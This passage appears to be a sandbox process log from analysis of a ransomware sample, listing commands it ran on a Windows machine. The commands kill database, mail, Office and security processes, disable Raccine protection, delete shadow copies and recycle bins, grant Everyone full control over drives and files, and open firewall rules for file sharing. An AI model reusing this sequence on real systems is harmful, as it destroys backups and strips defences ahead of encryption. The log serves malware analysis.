- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5668
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:5272
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4208
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:2180
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4824
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4384
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5336
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4308
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4900
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4200
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5132
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:4408
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4300
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:4816
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:6688
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5432
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5556
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4540
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:4204
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:4724
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:6732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5776
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:6956
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6364
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:1520
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:2244
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:2416
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:1512
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5272
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:4120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:4624
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:6024
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:6656
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:6456
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:1728
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:7120
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4472
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:6888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:6768
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:996
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:6916
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:6196
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:5368
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:2716
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:6960
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:5268
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:4228
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6116
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:6920
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:2200
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:4188
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:6228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:5940
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:4544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:6564
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:3880
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:6864
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3968
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:2900
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    PID:7152
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:4452
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6904
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:5320
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    - Kills process with taskkill
    PID:4328
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    - Kills process with taskkill
    PID:3520
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    - Kills process with taskkill
    PID:2972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    PID:4496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:5468
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    PID:6664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    PID:944
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    - Kills process with taskkill
    PID:6616
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    PID:5332
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    PID:6436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:5112
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    PID:7136
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    PID:6204
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    PID:6884
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /C C:\Windows\TEMP\tmp8AFB.bat
    3⤵
    PID:2812
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:6668
  - - C:\Windows\system32\find.exe
      find "}\"
      4⤵
      PID:6352
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
      4⤵
      PID:4120
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5064
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
      4⤵
      PID:5688
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6948
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
      4⤵
      PID:5508
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5448
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:6288
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5436
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6388
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4704
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:772
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:1248
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
    3⤵
    PID:5656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6260
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:5944
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2768
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q
    3⤵
    PID:4648
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q
    3⤵
    PID:6752
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q
    3⤵
    PID:5152
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q
    3⤵
    PID:736
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4572
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
    3⤵
    PID:4896
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
    3⤵
    PID:6564
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4016
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    PID:4552
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
    3⤵
    PID:5416
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    PID:4908
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    PID:4276
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
    3⤵
    PID:5536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
    3⤵
    PID:4628
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5016
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-065959-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:5148
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:4784
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:4260
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4508
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
    3⤵
    PID:6964
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
    3⤵
    - Modifies data under HKEY_USERS
    PID:6544
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:5168
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:7024
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:5472
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:6328
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q
    3⤵
    PID:5248
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q
    3⤵
    PID:5720
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q
    3⤵
    PID:6020
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:6292
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:5092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.80 /grant Everyone:F /T /C /Q
    3⤵
    PID:5824
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.83 /grant Everyone:F /T /C /Q
    3⤵
    PID:6104
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin.A0 /grant Everyone:F /T /C /Q
    3⤵
    PID:6300
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:5112
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant Everyone:F /T /C /Q
    3⤵
    PID:6896
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant Everyone:F /T /C /Q
    3⤵
    PID:4804
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant Everyone:F /T /C /Q
    3⤵
    PID:5396
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q
    3⤵
    PID:5660
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant Everyone:F /T /C /Q
    3⤵
    PID:6148
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q
    3⤵
    PID:6280
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5088
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant Everyone:F /T /C /Q
    3⤵
    PID:7072
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5780
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q
    3⤵
    PID:6008
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant Everyone:F /T /C /Q
    3⤵
    PID:6352
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant Everyone:F /T /C /Q
    3⤵
    PID:7140
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant Everyone:F /T /C /Q
    3⤵
    PID:6652
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant Everyone:F /T /C /Q
    3⤵
    PID:5348
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant Everyone:F /T /C /Q
    3⤵
    PID:5960
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\266D1CA4-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:6456
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5072
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:6484
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:5852
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:4612
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:5880
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:6768
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:6220
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7048
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\wfp\wfpdiag.etl /grant Everyone:F /T /C /Q
    3⤵
    PID:2132
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg /grant Everyone:F /T /C /Q
    3⤵
    PID:2204
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant Everyone:F /T /C /Q
    3⤵
    PID:4728
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q
    3⤵
    PID:4244
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q
    3⤵
    PID:5816
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:6904
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3112
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:4552
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:6956
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4792
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:3632
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:2396
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:4344
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3960
- - C:\Windows\system32\icacls.exe
